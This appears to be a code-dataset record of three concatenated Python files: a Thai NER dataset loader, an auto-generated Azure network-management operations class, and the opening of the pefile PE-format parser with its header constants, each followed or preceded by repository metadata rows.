"B-MONEY",
"B-ORGANIZATION",
"B-PERCENT",
"B-PERSON",
"B-PHONE",
"B-TIME",
"B-URL",
"B-ZIP",
"B-ไม่ยืนยัน",
"I-DATE",
"I-EMAIL",
"I-LAW",
"I-LEN",
"I-LOCATION",
"I-MONEY",
"I-ORGANIZATION",
"I-PERCENT",
"I-PERSON",
"I-PHONE",
"I-TIME",
"I-URL",
"I-ไม่ยืนยัน",
"O",
]
BUILDER_CONFIGS = [
ThaiNerConfig(
name="thainer",
version=datasets.Version("1.3.0"),
description="Thai Named Entity Recognition for PyThaiNLP (6,456 sentences)",
),
]
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{
"id": datasets.Value("int32"),
"tokens": datasets.Sequence(datasets.Value("string")),
"pos_tags": datasets.Sequence(datasets.features.ClassLabel(names=self._POS_TAGS)),
"ner_tags": datasets.Sequence(datasets.features.ClassLabel(names=self._NER_TAGS)),
}
),
supervised_keys=None,
homepage="https://github.com/wannaphong/thai-ner/",
citation=_CITATION,
license=_LICENSE,
)
def _split_generators(self, dl_manager):
data_path = dl_manager.download_and_extract(self._DOWNLOAD_URL)
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={"filepath": data_path},
),
]
def _generate_examples(self, filepath):
with open(filepath, encoding="utf-8") as f:
guid = 0
tokens = []
pos_tags = []
ner_tags = []
for line in f:
if line in self._SENTENCE_SPLITTERS:
if tokens:
yield guid, {
"id": str(guid),
"tokens": tokens,
"pos_tags": pos_tags,
"ner_tags": ner_tags,
}
guid += 1
tokens = []
pos_tags = []
ner_tags = []
else:
# thainer tokens are tab separated
splits = line.split("\t")
# replace junk ner tags
ner_tag = splits[2] if splits[2] in self._NER_TAGS else "O"
tokens.append(splits[0])
pos_tags.append(splits[1])
ner_tags.append(ner_tag.rstrip())
# last example
yield guid, {
"id": str(guid),
"tokens": tokens,
"pos_tags": pos_tags,
"ner_tags": ner_tags,
}
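# Illustrative usage sketch (not part of the loading script): scripts like this are
# normally consumed through the `datasets` library rather than run directly; the split
# name mirrors _split_generators above, and loading requires network access.
#     from datasets import load_dataset
#     thainer = load_dataset("thainer", split="train")
#     print(thainer[0]["tokens"], thainer[0]["ner_tags"])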
| 30.70303 | 122 | 0.51895 |
b2d4ee18d6d8a99e3d59be8485067461766467be | 22,419 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_12_01/operations/_interface_endpoints_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 2 | 2019-05-17T21:24:53.000Z | 2020-02-12T11:13:42.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_12_01/operations/_interface_endpoints_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 15 | 2019-07-12T18:18:04.000Z | 2019-07-25T20:55:51.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_12_01/operations/_interface_endpoints_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 2 | 2020-05-21T22:51:22.000Z | 2020-05-26T20:53:01.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class InterfaceEndpointsOperations(object):
"""InterfaceEndpointsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_12_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
interface_endpoint_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
interface_endpoint_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Deletes the specified interface endpoint.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
interface_endpoint_name=interface_endpoint_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
interface_endpoint_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.InterfaceEndpoint"
"""Gets the specified interface endpoint by resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: InterfaceEndpoint, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_12_01.models.InterfaceEndpoint
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpoint"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
interface_endpoint_name, # type: str
parameters, # type: "models.InterfaceEndpoint"
**kwargs # type: Any
):
# type: (...) -> "models.InterfaceEndpoint"
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpoint"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'InterfaceEndpoint')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
interface_endpoint_name, # type: str
parameters, # type: "models.InterfaceEndpoint"
**kwargs # type: Any
):
# type: (...) -> LROPoller
"""Creates or updates an interface endpoint in the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:param parameters: Parameters supplied to the create or update interface endpoint operation.
:type parameters: ~azure.mgmt.network.v2018_12_01.models.InterfaceEndpoint
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either InterfaceEndpoint or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2018_12_01.models.InterfaceEndpoint]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpoint"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
interface_endpoint_name=interface_endpoint_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
def list(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.InterfaceEndpointListResult"]
"""Gets all interface endpoints in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either InterfaceEndpointListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_12_01.models.InterfaceEndpointListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpointListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('InterfaceEndpointListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints'} # type: ignore
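# Illustrative iteration over the returned ItemPaged (the 'network_client'
# variable is a placeholder); pages are fetched lazily as the iterator advances, e.g.
# for endpoint in network_client.interface_endpoints.list('my-rg'):
# print(endpoint.name)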
def list_by_subscription(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["models.InterfaceEndpointListResult"]
"""Gets all interface endpoints in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either InterfaceEndpointListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_12_01.models.InterfaceEndpointListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpointListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-12-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_by_subscription.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('InterfaceEndpointListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/interfaceEndpoints'} # type: ignore
| 47.903846 | 205 | 0.662385 |
5622133ff54778788672e8fc9bab2a6f58cc0977 | 207,294 | py | Python | python/pefile.py | omarghader/pefile-go | b1abcb010d7d45cfcbe572dc15e315cf6f55c859 | [
"MIT"
] | 16 | 2016-08-08T13:17:12.000Z | 2021-04-01T20:00:54.000Z | python/pefile.py | Neo23x0/pefile-go | deef81088a615886265cbccfcbbcacb9280b96b1 | [
"MIT"
] | 1 | 2017-07-16T18:45:14.000Z | 2019-03-14T08:43:31.000Z | python/pefile.py | Neo23x0/pefile-go | deef81088a615886265cbccfcbbcacb9280b96b1 | [
"MIT"
] | 5 | 2018-03-14T22:26:42.000Z | 2019-09-29T00:50:17.000Z | # -*- coding: latin-1 -*-
"""pefile, Portable Executable reader module
All the PE file basic structures are available with their default names
as attributes of the instance returned.
Processed elements such as the import table are made available with lowercase
names, to differentiate them from the upper case basic structure names.
pefile has been tested against the limits of valid PE headers, that is, malware.
Lots of packed malware attempt to abuse the format way beyond its standard use.
To the best of my knowledge most of the abuses are handled gracefully.
Copyright (c) 2005-2013 Ero Carrera <ero.carrera@gmail.com>
All rights reserved.
For detailed copyright information see the file COPYING in
the root of the distribution archive.
"""
__revision__ = "$LastChangedRevision$"
__author__ = 'Ero Carrera'
__version__ = '1.2.10-9'
__contact__ = 'ero.carrera@gmail.com'
import os
import struct
import time
import math
import re
import exceptions
import string
import array
import mmap
import ordlookup
sha1, sha256, sha512, md5 = None, None, None, None
try:
import hashlib
sha1 = hashlib.sha1
sha256 = hashlib.sha256
sha512 = hashlib.sha512
md5 = hashlib.md5
except ImportError:
try:
import sha
sha1 = sha.new
except ImportError:
pass
try:
import md5
md5 = md5.new
except ImportError:
pass
try:
enumerate
except NameError:
def enumerate(iter):
L = list(iter)
return zip(range(0, len(L)), L)
def is_bytearray_available():
if isinstance(__builtins__, dict):
return ('bytearray' in __builtins__)
return ('bytearray' in __builtins__.__dict__)
fast_load = False
# This will set a maximum length of a string to be retrieved from the file.
# It's there to prevent loading massive amounts of data from memory mapped
# files. Strings longer than 1MB should be rather rare.
MAX_STRING_LENGTH = 0x100000 # 2^20
IMAGE_DOS_SIGNATURE = 0x5A4D
IMAGE_DOSZM_SIGNATURE = 0x4D5A
IMAGE_NE_SIGNATURE = 0x454E
IMAGE_LE_SIGNATURE = 0x454C
IMAGE_LX_SIGNATURE = 0x584C
IMAGE_TE_SIGNATURE = 0x5A56 # Terse Executables have a 'VZ' signature
IMAGE_NT_SIGNATURE = 0x00004550
IMAGE_NUMBEROF_DIRECTORY_ENTRIES= 16
IMAGE_ORDINAL_FLAG = 0x80000000L
IMAGE_ORDINAL_FLAG64 = 0x8000000000000000L
OPTIONAL_HEADER_MAGIC_PE = 0x10b
OPTIONAL_HEADER_MAGIC_PE_PLUS = 0x20b
directory_entry_types = [
('IMAGE_DIRECTORY_ENTRY_EXPORT', 0),
('IMAGE_DIRECTORY_ENTRY_IMPORT', 1),
('IMAGE_DIRECTORY_ENTRY_RESOURCE', 2),
('IMAGE_DIRECTORY_ENTRY_EXCEPTION', 3),
('IMAGE_DIRECTORY_ENTRY_SECURITY', 4),
('IMAGE_DIRECTORY_ENTRY_BASERELOC', 5),
('IMAGE_DIRECTORY_ENTRY_DEBUG', 6),
('IMAGE_DIRECTORY_ENTRY_COPYRIGHT', 7), # Architecture on non-x86 platforms
('IMAGE_DIRECTORY_ENTRY_GLOBALPTR', 8),
('IMAGE_DIRECTORY_ENTRY_TLS', 9),
('IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG', 10),
('IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT', 11),
('IMAGE_DIRECTORY_ENTRY_IAT', 12),
('IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT', 13),
('IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR',14),
('IMAGE_DIRECTORY_ENTRY_RESERVED', 15) ]
DIRECTORY_ENTRY = dict([(e[1], e[0]) for e in directory_entry_types]+directory_entry_types)
image_characteristics = [
('IMAGE_FILE_RELOCS_STRIPPED', 0x0001),
('IMAGE_FILE_EXECUTABLE_IMAGE', 0x0002),
('IMAGE_FILE_LINE_NUMS_STRIPPED', 0x0004),
('IMAGE_FILE_LOCAL_SYMS_STRIPPED', 0x0008),
('IMAGE_FILE_AGGRESIVE_WS_TRIM', 0x0010),
('IMAGE_FILE_LARGE_ADDRESS_AWARE', 0x0020),
('IMAGE_FILE_16BIT_MACHINE', 0x0040),
('IMAGE_FILE_BYTES_REVERSED_LO', 0x0080),
('IMAGE_FILE_32BIT_MACHINE', 0x0100),
('IMAGE_FILE_DEBUG_STRIPPED', 0x0200),
('IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP', 0x0400),
('IMAGE_FILE_NET_RUN_FROM_SWAP', 0x0800),
('IMAGE_FILE_SYSTEM', 0x1000),
('IMAGE_FILE_DLL', 0x2000),
('IMAGE_FILE_UP_SYSTEM_ONLY', 0x4000),
('IMAGE_FILE_BYTES_REVERSED_HI', 0x8000) ]
IMAGE_CHARACTERISTICS = dict([(e[1], e[0]) for e in
image_characteristics]+image_characteristics)
section_characteristics = [
('IMAGE_SCN_TYPE_REG', 0x00000000), # reserved
('IMAGE_SCN_TYPE_DSECT', 0x00000001), # reserved
('IMAGE_SCN_TYPE_NOLOAD', 0x00000002), # reserved
('IMAGE_SCN_TYPE_GROUP', 0x00000004), # reserved
('IMAGE_SCN_TYPE_NO_PAD', 0x00000008), # reserved
('IMAGE_SCN_TYPE_COPY', 0x00000010), # reserved
('IMAGE_SCN_CNT_CODE', 0x00000020),
('IMAGE_SCN_CNT_INITIALIZED_DATA', 0x00000040),
('IMAGE_SCN_CNT_UNINITIALIZED_DATA', 0x00000080),
('IMAGE_SCN_LNK_OTHER', 0x00000100),
('IMAGE_SCN_LNK_INFO', 0x00000200),
('IMAGE_SCN_LNK_OVER', 0x00000400), # reserved
('IMAGE_SCN_LNK_REMOVE', 0x00000800),
('IMAGE_SCN_LNK_COMDAT', 0x00001000),
('IMAGE_SCN_MEM_PROTECTED', 0x00004000), # obsolete
('IMAGE_SCN_NO_DEFER_SPEC_EXC', 0x00004000),
('IMAGE_SCN_GPREL', 0x00008000),
('IMAGE_SCN_MEM_FARDATA', 0x00008000),
('IMAGE_SCN_MEM_SYSHEAP', 0x00010000), # obsolete
('IMAGE_SCN_MEM_PURGEABLE', 0x00020000),
('IMAGE_SCN_MEM_16BIT', 0x00020000),
('IMAGE_SCN_MEM_LOCKED', 0x00040000),
('IMAGE_SCN_MEM_PRELOAD', 0x00080000),
('IMAGE_SCN_ALIGN_1BYTES', 0x00100000),
('IMAGE_SCN_ALIGN_2BYTES', 0x00200000),
('IMAGE_SCN_ALIGN_4BYTES', 0x00300000),
('IMAGE_SCN_ALIGN_8BYTES', 0x00400000),
('IMAGE_SCN_ALIGN_16BYTES', 0x00500000), # default alignment
('IMAGE_SCN_ALIGN_32BYTES', 0x00600000),
('IMAGE_SCN_ALIGN_64BYTES', 0x00700000),
('IMAGE_SCN_ALIGN_128BYTES', 0x00800000),
('IMAGE_SCN_ALIGN_256BYTES', 0x00900000),
('IMAGE_SCN_ALIGN_512BYTES', 0x00A00000),
('IMAGE_SCN_ALIGN_1024BYTES', 0x00B00000),
('IMAGE_SCN_ALIGN_2048BYTES', 0x00C00000),
('IMAGE_SCN_ALIGN_4096BYTES', 0x00D00000),
('IMAGE_SCN_ALIGN_8192BYTES', 0x00E00000),
('IMAGE_SCN_ALIGN_MASK', 0x00F00000),
('IMAGE_SCN_LNK_NRELOC_OVFL', 0x01000000),
('IMAGE_SCN_MEM_DISCARDABLE', 0x02000000),
('IMAGE_SCN_MEM_NOT_CACHED', 0x04000000),
('IMAGE_SCN_MEM_NOT_PAGED', 0x08000000),
('IMAGE_SCN_MEM_SHARED', 0x10000000),
('IMAGE_SCN_MEM_EXECUTE', 0x20000000),
('IMAGE_SCN_MEM_READ', 0x40000000),
('IMAGE_SCN_MEM_WRITE', 0x80000000L) ]
SECTION_CHARACTERISTICS = dict([(e[1], e[0]) for e in
section_characteristics]+section_characteristics)
debug_types = [
('IMAGE_DEBUG_TYPE_UNKNOWN', 0),
('IMAGE_DEBUG_TYPE_COFF', 1),
('IMAGE_DEBUG_TYPE_CODEVIEW', 2),
('IMAGE_DEBUG_TYPE_FPO', 3),
('IMAGE_DEBUG_TYPE_MISC', 4),
('IMAGE_DEBUG_TYPE_EXCEPTION', 5),
('IMAGE_DEBUG_TYPE_FIXUP', 6),
('IMAGE_DEBUG_TYPE_OMAP_TO_SRC', 7),
('IMAGE_DEBUG_TYPE_OMAP_FROM_SRC', 8),
('IMAGE_DEBUG_TYPE_BORLAND', 9),
('IMAGE_DEBUG_TYPE_RESERVED10', 10),
('IMAGE_DEBUG_TYPE_CLSID', 11) ]
DEBUG_TYPE = dict([(e[1], e[0]) for e in debug_types]+debug_types)
subsystem_types = [
('IMAGE_SUBSYSTEM_UNKNOWN', 0),
('IMAGE_SUBSYSTEM_NATIVE', 1),
('IMAGE_SUBSYSTEM_WINDOWS_GUI', 2),
('IMAGE_SUBSYSTEM_WINDOWS_CUI', 3),
('IMAGE_SUBSYSTEM_OS2_CUI', 5),
('IMAGE_SUBSYSTEM_POSIX_CUI', 7),
('IMAGE_SUBSYSTEM_NATIVE_WINDOWS', 8),
('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', 9),
('IMAGE_SUBSYSTEM_EFI_APPLICATION', 10),
('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', 11),
('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', 12),
('IMAGE_SUBSYSTEM_EFI_ROM', 13),
('IMAGE_SUBSYSTEM_XBOX', 14),
('IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION', 16)]
SUBSYSTEM_TYPE = dict([(e[1], e[0]) for e in subsystem_types]+subsystem_types)
machine_types = [
('IMAGE_FILE_MACHINE_UNKNOWN', 0),
('IMAGE_FILE_MACHINE_I386', 0x014c),
('IMAGE_FILE_MACHINE_R3000', 0x0162),
('IMAGE_FILE_MACHINE_R4000', 0x0166),
('IMAGE_FILE_MACHINE_R10000', 0x0168),
('IMAGE_FILE_MACHINE_WCEMIPSV2',0x0169),
('IMAGE_FILE_MACHINE_ALPHA', 0x0184),
('IMAGE_FILE_MACHINE_SH3', 0x01a2),
('IMAGE_FILE_MACHINE_SH3DSP', 0x01a3),
('IMAGE_FILE_MACHINE_SH3E', 0x01a4),
('IMAGE_FILE_MACHINE_SH4', 0x01a6),
('IMAGE_FILE_MACHINE_SH5', 0x01a8),
('IMAGE_FILE_MACHINE_ARM', 0x01c0),
('IMAGE_FILE_MACHINE_THUMB', 0x01c2),
('IMAGE_FILE_MACHINE_ARMNT', 0x01c4),
('IMAGE_FILE_MACHINE_AM33', 0x01d3),
('IMAGE_FILE_MACHINE_POWERPC', 0x01f0),
('IMAGE_FILE_MACHINE_POWERPCFP',0x01f1),
('IMAGE_FILE_MACHINE_IA64', 0x0200),
('IMAGE_FILE_MACHINE_MIPS16', 0x0266),
('IMAGE_FILE_MACHINE_ALPHA64', 0x0284),
('IMAGE_FILE_MACHINE_AXP64', 0x0284), # same
('IMAGE_FILE_MACHINE_MIPSFPU', 0x0366),
('IMAGE_FILE_MACHINE_MIPSFPU16',0x0466),
